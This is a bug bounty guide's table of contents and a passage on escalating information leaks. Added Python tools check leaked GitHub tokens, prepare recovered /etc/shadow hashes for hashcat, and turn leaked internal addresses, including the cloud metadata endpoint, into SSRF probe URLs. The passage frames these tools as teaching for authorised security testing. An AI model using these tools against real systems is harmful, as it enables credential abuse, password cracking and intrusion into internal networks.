- The Guide to Finding and Reporting Web Vulnerabilities
- About the Author
- About the Tech Reviewer
- Foreword
- Introduction
- Who This Book Is For
- What Is In This Book
- Happy Hacking!
- 1 Picking a Bug Bounty Program
- 2 Sustaining Your Success
- 3 How the Internet Works
- 4 Environmental Setup and Traffic Interception
- 5 Web Hacking Reconnaissance
- 6 Cross-Site Scripting
- 7 Open Redirects
- 8 Clickjacking
- 9 Cross-Site Request Forgery
- 10 Insecure Direct Object References
- 11 SQL Injection
- 12 Race Conditions
- 13 Server-Side Request Forgery
- 14 Insecure Deserialization
- 15 XML External Entity
- 16 Template Injection
- 17 Application Logic Errors and Broken Access Control
- 18 Remote Code Execution
- 19 Same-Origin Policy Vulnerabilities
- 20 Single-Sign-On Security Issues
- 21 Information Disclosure
- 22 Conducting Code Reviews
- 23 Hacking Android Apps
- 24 API Hacking
- 25 Automatic Vulnerability Discovery Using Fuzzers
Escalating the Attack
After you’ve found a sensitive file or a piece of sensitive data, you have to determine its impact before reporting it. For example, if you’ve found credentials such as a password or an API key, you need to validate that they’re currently in use by accessing the target’s system with them. Keep that validation minimal and within the program’s scope: a single read-only request that proves the credential is live (an identity or “whoami”-style endpoint, for instance) is sufficient evidence, and it avoids touching customer data. I often find outdated credentials that cannot be used to access anything. In that case, the information leak isn’t a vulnerability.
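The validation step described above, as an added example that is not part of the book: a small Python tool that checks whether a leaked GitHub token is live with exactly one read-only request (`GET /user`) and reads the token’s scopes from the `X-OAuth-Scopes` response header to decide how serious the finding is. The endpoint, the scope list used for severity and the `leak-triage` user agent are this example’s own choices; the fetch function is injectable so the classifier can be exercised without network access.

```python
"""Minimal-impact validation of a leaked GitHub token.

Added example, not from the book: checks whether a token found in a leak is
live with one read-only request and records what it is scoped to, so the
report can state impact without the tester ever touching a repository. The
fetch function is injectable, which also lets the classifier run offline.
"""
import json
import sys
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, Tuple

GITHUB_USER_ENDPOINT = "https://api.github.com/user"  # read-only identity call

# Scopes that give write or administrative reach over an organisation's code
# (assumed list for this example; extend it to match the program's concerns).
HIGH_IMPACT_SCOPES = {"repo", "admin:org", "write:packages", "delete_repo", "workflow"}

Response = Tuple[int, Dict[str, str], bytes]


@dataclass
class TokenAssessment:
    live: bool
    login: str = ""
    scopes: Tuple[str, ...] = ()
    severity: str = "none"
    note: str = ""


def github_fetch(token: str) -> Response:
    """Perform the single permitted request: GET /user authenticated with the token."""
    req = urllib.request.Request(
        GITHUB_USER_ENDPOINT,
        headers={
            "Authorization": f"token {token}",
            "Accept": "application/vnd.github+json",
            "User-Agent": "leak-triage",
        },
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, {k.lower(): v for k, v in resp.headers.items()}, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, {k.lower(): v for k, v in err.headers.items()}, err.read()


def classify(status: int, headers: Dict[str, str], body: bytes) -> TokenAssessment:
    """Turn the response into a finding: dead token, or live token and its reach."""
    if status == 401:
        return TokenAssessment(False, note="revoked or expired; on its own this is not a vulnerability")
    if status != 200:
        return TokenAssessment(False, note=f"unexpected status {status}; stop and review before retrying")
    login = json.loads(body).get("login", "")
    # Classic tokens advertise their scopes in X-OAuth-Scopes; fine-grained
    # tokens omit the header, so treat absence as "unknown, review manually".
    raw = headers.get("x-oauth-scopes", "")
    scopes = tuple(s.strip() for s in raw.split(",") if s.strip())
    if not scopes:
        return TokenAssessment(True, login, (), "medium", "live; scopes not advertised, review manually")
    if HIGH_IMPACT_SCOPES & set(scopes):
        return TokenAssessment(True, login, scopes, "high", "live with write/admin reach over repositories")
    return TokenAssessment(True, login, scopes, "low", "live with read-only or narrow scopes")


def assess_token(token: str, fetch: Callable[[str], Response] = github_fetch) -> TokenAssessment:
    return classify(*fetch(token))


if __name__ == "__main__":
    # Usage: python triage_token.py <token>; makes exactly one network request.
    result = assess_token(sys.argv[1])
    print(f"live={result.live} user={result.login!r} severity={result.severity} scopes={result.scopes}")
    print(result.note)
```

A 401 is the “outdated credential” case from the text and ends the test; a 200 with `repo` or an admin scope is the evidence to put in the report, and nothing beyond that one call is needed to prove it.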
If the sensitive files or credentials you’ve found are valid and current, consider how you could compromise the application’s security with them. For example, if you found a GitHub access token, you may be able to read the organization’s private repositories or, depending on the token’s scopes, push to its projects. If you find the password to an admin portal, you might be able to leak customers’ private information. And if you can read the /etc/shadow file on a target server, you might be able to crack the system users’ password hashes and take over the system! Demonstrate each of these with the least intrusive proof the program allows (the name of one private repository, a screenshot of the admin dashboard after login, the hash prefixes from /etc/shadow) rather than pulling customer data or cracking every account. Reporting an information leak is often about communicating the impact of that leak to the company by highlighting the criticality of the leaked information.
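The /etc/shadow case above, as an added example that is not part of the book: before spending GPU time, triage the file to see which accounts even have a crackable hash, which scheme and cost they use, and which tool can attack them. The hashcat mode numbers are the standard ones for md5crypt, sha256crypt and sha512crypt; the sample shadow lines are constructed, and their hash values are placeholders rather than real hashes.

```python
"""Triage of a recovered /etc/shadow before any cracking is attempted.

Added example, not from the book: parses shadow entries, skips locked and
passwordless accounts, identifies the hash scheme and its cost parameter,
and writes the crackable entries in the user:hash form hashcat accepts.
SAMPLE_SHADOW is constructed for illustration; the hash values are not real.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Modular-crypt prefix -> (scheme, hashcat mode). yescrypt ($y$) has no
# hashcat mode at the time of writing and is left for John the Ripper.
SCHEMES = {
    "1": ("md5crypt", 500),
    "5": ("sha256crypt", 7400),
    "6": ("sha512crypt", 1800),
    "y": ("yescrypt", None),
}
CRYPT_RE = re.compile(r"^\$([^$]+)\$(?:rounds=(\d+)\$)?")


@dataclass
class ShadowEntry:
    user: str
    scheme: str
    hashcat_mode: Optional[int]
    rounds: Optional[int]
    hash_field: str


def parse_shadow(text: str) -> List[ShadowEntry]:
    """Return the entries that actually carry a crackable hash, root first."""
    entries: List[ShadowEntry] = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or not fields[0]:
            continue
        user, pw = fields[0], fields[1]
        # "*", "!", "!!" and a leading "!" all mean the account is locked;
        # an empty field means no password is set. Nothing to crack either way.
        if pw in ("", "*") or pw.startswith("!"):
            continue
        match = CRYPT_RE.match(pw)
        if not match:
            continue  # legacy DES crypt or a format we do not recognise
        scheme_id, rounds = match.groups()
        scheme, mode = SCHEMES.get(scheme_id, (f"unknown(${scheme_id}$)", None))
        entries.append(ShadowEntry(user, scheme, mode, int(rounds) if rounds else None, pw))
    # Crack root first: it is the takeover path the text describes.
    entries.sort(key=lambda e: (e.user != "root", e.user))
    return entries


def hashcat_lines(entries: List[ShadowEntry]) -> List[str]:
    """user:hash lines for the entries hashcat can handle (run it with --username)."""
    return [f"{e.user}:{e.hash_field}" for e in entries if e.hashcat_mode is not None]


SAMPLE_SHADOW = """\
root:$6$rounds=5000$Zm9vYmFy$QW5vbnltb3VzU2hhZG93SGFzaFZhbHVlRm9ySWxsdXN0cmF0aW9uT25seTEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice:$5$c2FsdHNhbHQ$RXhhbXBsZVNoYTI1NkNyeXB0SGFzaFZhbHVlMTIzNDU2Nzg5:19000:0:99999:7:::
bob:!$6$bG9ja2Vk$TG9ja2VkQWNjb3VudEhhc2g:19000:0:99999:7:::
carol:$y$j9T$c2FsdHNhbHRzYWx0c2FsdA$WWVzY3J5cHRIYXNoVmFsdWU:19000:0:99999:7:::
legacy:ab3Fds9kLm2Qw:19000:0:99999:7:::
"""

if __name__ == "__main__":
    for entry in parse_shadow(SAMPLE_SHADOW):
        cost = f"rounds={entry.rounds}" if entry.rounds else "default cost"
        print(f"{entry.user:8} {entry.scheme:12} hashcat mode={entry.hashcat_mode} {cost}")
    print("\n".join(hashcat_lines(parse_shadow(SAMPLE_SHADOW))))
```

For a bug bounty report the output of `parse_shadow` (user names, schemes and whether root is crackable) is usually all you need to show; running the cracker against a real target is only appropriate if the program explicitly allows it.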
If the impact of the information you found isn’t particularly critical, explore ways to escalate the vulnerability by chaining it with other security issues. For example, if you can leak internal IP addresses or hostnames from the target’s network, you can use them as targets for an SSRF exploit, reaching services that are not exposed to the internet. Alternatively, if you can pinpoint the exact software version the application is running, check whether any CVEs affect that version and could help you achieve RCE: a version string on its own is a low-severity finding, but paired with a known exploitable flaw it becomes the first step of a much more serious chain.
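The internal-address chaining above, as an added example that is not part of the book: a Python helper that mines a leaked artefact (a config dump, a JavaScript bundle, a stack trace) for addresses that are only reachable from inside the target’s network, ranks them by how much an SSRF against them would likely yield, and turns them into candidate probe URLs. The internal hostname suffixes, port list and ranking are this example’s own assumptions, and the sample leak is constructed.

```python
"""Mining a leaked artefact for internal network targets to chain with SSRF.

Added example, not from the book: pulls IPv4 addresses and URLs out of leaked
text, keeps only the ones that are unreachable from the internet and therefore
only matter through an SSRF, ranks them by likely payoff, and turns them into
probe URLs. SAMPLE_LEAK is constructed for illustration.
"""
import ipaddress
import re
from typing import Dict, List, Tuple

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
CLOUD_METADATA = ipaddress.ip_address("169.254.169.254")
INTERNAL_SUFFIXES = (".internal", ".local", ".corp", ".lan", ".intranet")  # assumed
DEFAULT_PORTS = (80, 443, 8080, 8443)  # assumed starting set; extend from the leak itself


def internal_targets(text: str) -> List[Tuple[str, str]]:
    """Return (target, reason) pairs, most valuable first, deduplicated."""
    found: Dict[str, Tuple[int, str]] = {}
    for token in IPV4_RE.findall(text):
        try:
            ip = ipaddress.ip_address(token)
        except ValueError:
            continue  # a version string such as 10.2.300.1 is not an address
        # Order matters: loopback and link-local also count as "private" in Python.
        if ip == CLOUD_METADATA:
            found.setdefault(token, (0, "cloud metadata service; instance credentials via SSRF"))
        elif ip.is_loopback:
            found.setdefault(token, (1, "loopback; admin interfaces bound to localhost"))
        elif ip.is_link_local:
            found.setdefault(token, (3, "link-local"))
        elif ip.is_private:
            found.setdefault(token, (2, "RFC 1918 host"))
    for url in URL_RE.findall(text):
        host = re.sub(r"^https?://", "", url).split("/")[0].split(":")[0]
        if host.endswith(INTERNAL_SUFFIXES) or "." not in host:
            found.setdefault(url, (4, "internal hostname; resolves only inside the target network"))
    ranked = sorted(found.items(), key=lambda kv: kv[1][0])
    return [(target, reason) for target, (_, reason) in ranked]


def ssrf_probes(targets: List[Tuple[str, str]], ports: Tuple[int, ...] = DEFAULT_PORTS) -> List[str]:
    """Candidate URLs to feed into the SSRF parameter, one per target and port."""
    probes: List[str] = []
    for target, _ in targets:
        if target.startswith("http"):
            probes.append(target)  # internal URL from the leak: try it verbatim first
        elif target == str(CLOUD_METADATA):
            probes.append(f"http://{target}/latest/meta-data/")  # AWS-style path; other clouds differ
        else:
            probes.extend(f"http://{target}:{port}/" for port in ports)
    return probes


SAMPLE_LEAK = """\
# constructed fragment of a leaked deployment config
DB_HOST=10.20.5.17
CACHE_URL=http://redis.internal:6379
METRICS=http://169.254.169.254/latest/meta-data/
ADMIN=http://127.0.0.1:8443/console
PUBLIC_CDN=https://cdn.example.com/static
APP_VERSION=10.2.300.1
"""

if __name__ == "__main__":
    targets = internal_targets(SAMPLE_LEAK)
    for target, reason in targets:
        print(f"{target:45} {reason}")
    print("\n".join(ssrf_probes(targets)))
```

The ranking encodes where an SSRF usually pays off first: the cloud metadata endpoint (credentials), then services bound to localhost (admin consoles that assume no one else can reach them), then ordinary RFC 1918 hosts. The public CDN host and the version string are discarded, which is the point: the leak is only interesting for the parts you cannot reach any other way.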